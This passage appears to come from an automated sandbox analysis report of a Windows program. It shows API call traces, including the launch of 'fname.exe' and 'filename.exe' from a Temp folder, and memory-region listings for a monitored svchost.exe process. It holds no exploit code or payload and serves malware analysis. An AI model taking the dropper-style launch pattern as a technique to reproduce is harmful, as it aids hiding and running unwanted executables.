(nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.928] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0291.975] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.239] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0292.809] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0293.176] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.361] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0294.601] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0295.295] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0300.876] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0304.148] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0304.707] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0305.638] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0306.597] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0306.890] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0307.716] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0308.479] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0308.727] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0309.207] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0309.800] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0310.526] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0313.962] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0314.743] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x0 [0314.744] PeekMessageW (in: lpMsg=0x54af974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x54af974) returned 1 [0314.835] IsWindow (hWnd=0x70276) returned 1 [0314.837] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75640000 [0314.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x54af880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWRj\x89\x871\x86 «ðkPùJ\x05\x08õc", lpUsedDefaultChar=0x0) returned 14 [0314.838] GetProcAddress (hModule=0x75640000, lpProcName="DefWindowProcW") returned 0x778baee0 [0314.838] SetWindowLongW (hWnd=0x70276, nIndex=-4, dwNewLong=2005642976) returned 81856542 [0314.839] SetClassLongW (hWnd=0x70276, nIndex=-24, dwNewLong=2005642976) returned 0x4e1081e [0314.840] IsWindow (hWnd=0x70276) returned 1 [0314.840] DestroyWindow (hWnd=0x70276) returned 1 [0314.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0314.855] UnregisterClassW (lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", hInstance=0x400000) returned 1 [0314.856] SetConsoleCtrlHandler (HandlerRoutine=0x4e107f6, Add=0) returned 1 [0314.857] SetEvent (hEvent=0x51c) returned 1 [0314.857] CoGetContextToken (in: pToken=0x54afcbc | out: pToken=0x54afcbc) returned 0x0 [0314.858] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x54afce0 | out: ppvObject=0x54afce0*=0x601a94) returned 0x0 [0314.858] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x54afd0c | out: pThreadType=0x54afd0c*=0) returned 0x0 [0314.858] IUnknown:Release (This=0x601a94) returned 0x0 [0314.858] CoUninitialize () Thread: id = 14 os_tid = 0xf4c Thread: id = 127 os_tid = 0xd90 [0304.154] CoGetContextToken (in: pToken=0x68efc8c | out: pToken=0x68efc8c) returned 0x0 [0304.154] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x68efcb0 | out: ppvObject=0x68efcb0*=0x601a94) returned 0x0 [0304.155] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x68efcdc | out: pThreadType=0x68efcdc*=0) returned 0x0 [0304.155] IUnknown:Release (This=0x601a94) returned 0x0 Thread: id = 128 os_tid = 0x8d8 Thread: id = 129 os_tid = 0x534 [0288.832] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0288.832] RoInitialize () returned 0x1 [0288.832] RoUninitialize () returned 0x0 [0288.834] ResetEvent (hEvent=0x2ec) returned 1 Thread: id = 130 os_tid = 0xed8 [0290.072] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0290.084] RoInitialize () returned 0x1 [0290.084] RoUninitialize () returned 0x0 [0290.086] ShellExecuteExW (in: pExecInfo=0x22081f4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", lpParameters=0x0, lpDirectory="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x22081f4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", lpParameters=0x0, lpDirectory="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x630)) returned 1 [0292.181] CoGetContextToken (in: pToken=0x5c4fba0 | out: pToken=0x5c4fba0) returned 0x0 [0292.224] CoUninitialize () Thread: id = 136 os_tid = 0x60c [0295.423] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0297.162] RoInitialize () returned 0x1 [0297.162] RoUninitialize () returned 0x0 [0297.164] ShellExecuteExW (in: pExecInfo=0x221bb30*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe", lpParameters=0x0, lpDirectory="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x221bb30*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe", lpParameters=0x0, lpDirectory="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x304)) returned 1 [0309.785] CoGetContextToken (in: pToken=0x5c4fb20 | out: pToken=0x5c4fb20) returned 0x0 [0309.785] CoUninitialize () Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7534a000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac37" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2364 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2365 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2366 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2367 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2368 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2369 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2370 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2371 start_va = 0x100000 end_va = 0x100fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 2372 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2373 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2374 start_va = 0x140000 end_va = 0x140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 2375 start_va = 0x150000 end_va = 0x151fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2376 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2377 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2378 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2379 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2380 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2381 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2382 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2383 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2384 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2385 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2386 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2387 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2388 start_va = 0x5c0000 end_va = 0x747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2389 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2390 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2391 start_va = 0x770000 end_va = 0x773fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2392 start_va = 0x780000 end_va = 0x783fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2393 start_va = 0x790000 end_va = 0x796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2394 start_va = 0x7a0000 end_va = 0x7e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2395 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2396 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2397 start_va = 0xa90000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2398 start_va = 0xb50000 end_va = 0xf4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2399 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2400 start_va = 0x1000000 end_va = 0x104efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 2401 start_va = 0x10b0000 end_va = 0x10b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2402 start_va = 0x10d0000 end_va = 0x10d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2403 start_va = 0x1100000 end_va = 0x1106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2404 start_va = 0x1110000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2405 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2406 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2407 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2408 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2409 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2410 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 2411 start_va = 0x1a40000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 2412 start_va = 0x1b40000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2413 start_va = 0x1c40000 end_va = 0x1ccdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2414 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2415 start_va = 0x1e40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2416 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2417 start_va = 0x2040000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2418 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2419 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2420 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2421 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2422 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2423 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2424 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 2425 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2426 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2427 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2428 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2429 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2430 start_va = 0x2c00000 end_va = 0x2cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2431 start_va = 0x2ce0000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 2432 start_va = 0x2de0000 end_va = 0x2edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 2433 start_va = 0x2ee0000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 2434 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2435 start_va = 0x3100000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2436 start_va = 0x3180000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2437 start_va = 0x3200000 end_va = 0x3206fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2438 start_va = 0x3210000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 2439 start_va = 0x3310000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2440 start_va = 0x3610000 end_va = 0x370ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2441 start_va = 0x3780000 end_va = 0x3786fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2442 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 2443 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 2444 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 2445 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 2446 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2447 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 2448 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2449 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 2450 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 2451 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2452 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2453 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2454 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2455 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2456 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2457 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2458 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 2459 start_va = 0x4a00000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 2460 start_va = 0x4a80000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 2461 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 2462 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 2463 start_va = 0x4d00000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2464 start_va = 0x4d80000 end_va = 0x4d80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2465 start_va = 0x4e90000 end_va = 0x4e91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2466 start_va = 0x4eb0000 end_va = 0x4eb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004eb0000" filename = "" Region: id = 2467 start_va = 0x4ec0000 end_va = 0x4ec4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2468 start_va = 0x4ed0000 end_va = 0x4ed6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 2469 start_va = 0x4ee0000 end_va = 0x4eeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2470 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 2471 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 